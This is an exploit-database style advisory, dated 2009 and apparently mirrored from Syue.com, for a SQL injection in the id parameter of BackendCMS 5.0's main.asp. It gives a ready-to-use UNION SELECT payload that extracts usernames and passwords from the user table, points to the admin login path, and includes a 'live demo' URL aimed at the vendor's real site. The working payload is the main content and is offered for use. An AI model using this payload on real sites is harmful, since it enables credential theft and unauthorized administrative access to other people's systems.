[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BackendCMS 5.0 (main.asp id) SQL Injection Vulnerability
# Published : 2009-04-09
# Author : AnGeL25dZ
# Previous Title : Exjune Guestbook v2 Remote Database Disclosure Exploit
# Next Title : Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC
************************************************************
** BackendCMS Version 5.0 SQl Injection
************************************************************
** Prodcut: BackendCMS Version 5.0
** Home : http://www.backendcms.dk/
** Vunlerability : SQL Injection
** Dork : find it yourself
**
************************************************************
** Discovred by: AnGeL25dZ
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeach
** All Members of http://islam-attack.com
** ra3ch and all my friends ...MOC
**
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit: http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
# www.Syue.com [2009-04-09]